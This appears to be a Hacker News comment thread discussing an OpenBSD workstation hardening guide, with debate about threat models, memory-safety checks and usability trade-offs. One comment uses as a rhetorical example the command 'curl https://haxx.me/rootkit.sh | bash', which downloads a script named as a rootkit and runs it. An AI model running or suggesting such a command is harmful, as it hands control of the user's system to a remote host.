OpenBSD Workstation Hardening
dataswamp.org
dataswamp.org
Then I remembered! Windows NT did exactly that: you had to press ctrl+alt+del to log in.
But, yes, I get what you're saying. A physical interaction that can not be, or is extremely difficult, spoofed via software would be valuable here.
https://dataswamp.org/~solene/2023-12-31-hardened-openbsd-wo...
edit: oh, it's for outbound ssh, but I'm still none the wiser in terms of auditing (or what that would do to git clones without some modification)
How would the added protection compare to safety in rust?
Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
These checks are good, but they do not go as far as Rust does in terms of statically preventing issues.
> Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
It helps but one aspect of runtime vs compile time checking is that for runtime checks, you only get the checks if you actually exercise the code path that causes the issue. If you ship with some checks on in development, and turn them off in release, you run the risk of having missed cases that will still cause problems.
All of this is better than doing nothing at all, and is a good thing.
I sometimes wish there was a straightforward (and not causing reduced functionality) way of configuring a normal Linux distro in 'single user' mode.
I just meant the "softening guide" might've helped from the perspective of the company who'd like to land those customers. I don't think it's the best way, but at the right moment it might've salvaged some sales.
Home directories in memory, proxied outbound SSH connections, high levels of encryption and absolute minimum installed software to do the job required.
The consequences of OpSec failure is.... well, rather serious :)
(it was featured on hn a few years back)
That's the impression a lot of these 'hardening guides' give, intentionally or not. But fundamentally they're like 'tactical' pants except for nerds.
Following all of the advice in the document was an excellent way to end up with a completely useless system. Worse, thanks to Windows horrible logging infrastructure it was almost impossible to figure out exactly what change was causing a particular bit of breakage. You never EVER get an error message that reads anything like "HKLM\SYSTEM\CurrentControlSet\Services\Ramdisk" : Permission Denied reading key "StartOverride", service halted".
Instead it is some generic "the system failed to start" message that doesn't help at all.
> That isn’t what they do though. Defcon 30 shared what an actual Darknet user did.
and he got arrested, and did actual prison time. now it sounds like it wasn't all his technical opsec that got him in trouble, but just cuz some dude played fast and loose doesn't mean they all do.
the ones who ain't been caught are probably a lot stricter... or a lot more lucky.
https://darknetdiaries.com/episode/132/
YouTube from above without the tracking:
Lesson one: Security is a spectrum. There is a difference between "No exploits in our base installation" and "The top nation-states of the world may be trying to load software of unknown capability onto my networked computer".
Just joking, I love OpenBSD
I did that for computer that was used to sign bitcoin transactions offline. User typed hashes manually...
Be very careful if anonymous developers suddenly contribute OpenBSD drivers for every single component in the 20 year old garage sale laptop you use for hosting an "online store" on TOR
then be an oddball in the ecosystem to the point where you're obvious and stand out dramatically.
kinda like how one of the FBI's MONSTER email filters they looked for was anything BSD
So this advice should be fine if you feel you want to follow it :)
"Ask me how I know"
This guide is partly Security 101, partly for a localhost admin. Things are different when you run an organization with a centrally managed catalogue. Or you are sane and have a clear picture of the attack vectors.
Least privilege? Yes, of course.
Drop inbound by default? Yes, of course and it's amazing how many self-titled Linux Administrators insist what the machine should be 'secure from start so no firewall is needed'. Also this guide implies a workspace which questions what exactly kind of malicious traffic a [single] OpenBSD machine in the network would receive.
Drop outbound by default? Yes and BTW it's pretty easy on Windows, because the Windows Defender Firewall (what a mouthful) is pretty capable to filter by an application, not just by IPs and ports, so you don't need this SOCKS ersatz app firewall.
> Live in a temporary file-system
Now this is just ridiculous. As other said this is Silk Road level of paranoia.
> Disable webcam and microphone
Don't connect them in the first place?
> Disabling USB ports
See the temporary file-system. Good luck finding a notebook with PS/2 or serial ports.
> auto-updating the packages and base system daily on a computer is the minimum that should be done everywhere
Oh god.
> 10.1. Specialized proxies §
> It could be possible to have different proxy users, with each restriction to the remote ports allowed, we could imagine proxies like
> Of course, this is even more tedious than the multipurpose proxy, but at least, it's harder for a program to guess what proxy to use, especially if you don't connect them all at once.
Now this is what bugs me most of this guide.
If you already allowed something to run on your machine then it is usually too late for security through obscurity exercises. Most of the things advised here would just make your life miserable and would lead to disabling or shortcutting them.
Future proof deploy of what exactly?
What is the attack vector? Network, physical, both?
Who is the perpetrator? Nation, criminal, NSA, FSB, your disgruntled employee or your {business,sexual} partner trying to bury you?
Who is the operator of this machine? Do you trust him or do you explicitly do not? Does he runs 'curl https://haxx.me/rootkit.sh | bash' every day?
What about maid service?
What services or data is on the machine? Can it be triggered to execute something from a 3rd party endpoint? Do the data comes from the uncontrolled endpoints (eg Internet but this is not the only one vector)?
SELinux can be somewhat classified as an app firewall but it's a policy framework after all and that suited for that.
Good luck with that on laptops.
>PS2
Most touchpads and laptop keyboards are already PS2 bound.
Security 102: Nobody has a clear picture of the attack vectors.
I'm running very hardened Linux "workstations" and things, once setup, just work. I created a shell script verifying lots and lots of things and warning me if I forgot to harden something. I then simply re-run my script every time I install a new Linux (which is not that often). The script even modifies config file for me:
Setting xyz-fribulator is set to 0, although it should be set 2, do you want me to modify xxx.cfg for you? [Y/N]
Makes hardening a new system a breeze.For example I really don't see why a user should see processes belonging to other users. I've got about 30 settings like that, plus a beefy firewall, plus, as in TFA, a "no sudo / no doas" from the regular user rule.
Haters gotta hate, of course.